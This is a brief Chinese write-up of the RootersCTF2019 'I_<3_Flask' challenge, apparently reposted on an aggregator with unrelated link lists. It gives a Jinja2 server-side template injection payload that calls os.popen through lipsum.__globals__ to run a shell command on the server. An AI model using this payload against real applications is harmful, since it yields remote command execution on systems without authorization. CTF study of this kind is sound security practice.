[RootersCTF2019]I_＜3_Flask

其他 2021-04-03 23:03:11 阅读次数: 0

WP

一道简单的SSTI，主要的难点还是找注入的参数。
学习了利用arjun这个HTTP参数发现工具：
Arjun
发现注入点是name参数。
在这里插入图片描述

然后简单的SSTI一下就可以了：

?name={
    
    {
    
    lipsum.__globals__.os.popen('cat flag.txt').read()}}

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/rfrder/article/details/114442903

BUUCTF RootersCTF2019]I_＜3_Flask

[RootersCTF2019]I_＜3_Flask

BUUCTF：[RootersCTF2019]babyWeb

3_Flask中URL与视图函数的映射

I_最后沟通

ZSQ_(原创题)_DJ的大脑风暴 i_(SZY_4_3_01_20_AC)

java核心技术I_构造器note2

2019 GUDT WPTC 3 Div.2 Problem I(题解)

flask（3）

Flask(3)

3.i++ ++i

Flask（3）：Flask的模板templates

3 I

NCPC I 2019

Google I/O 2019

How do I deploy a Flask application in IIS?

flask - day3

浅谈flask-3

flask(3)：表单处理

3---Flask-SQLAlchemy

Flask学习3 备忘

flask 杂记3

Flask框架基础3

Flask学习（3）——表单

Flask学习笔记（3）

(3)Flask 应用

Flask 3（会话技术）

flask基础3

【flask笔记3】

2019 GDUT Winter Training I

今日推荐

周排行

3.5星|津巴多《时间的悖论》：未来导向的人更有可能取得个人的成功，但帮助他人的可能性更小

k8s无脑系列（二）-DNS服务搭建和访问

leetcode 26 从排序数组中删除重复项

Python Web 框架：Django、Flask 与 Tornado

中科院计算所研究员陈益强：越来越'聪明'的智能硬件

dotNET面试（二）

数据备份恢复

vue 路由知识点梳理及应用场景整理

ajax局部刷新流程

分段、分页&&内存碎片、外存碎片

每日归档

2025-03-22(0)

2025-03-21(0)

2025-03-20(0)

2025-03-19(0)

2025-03-18(0)

2025-03-17(0)

2025-03-16(0)

2025-03-15(0)

2025-03-14(0)

2025-03-13(0)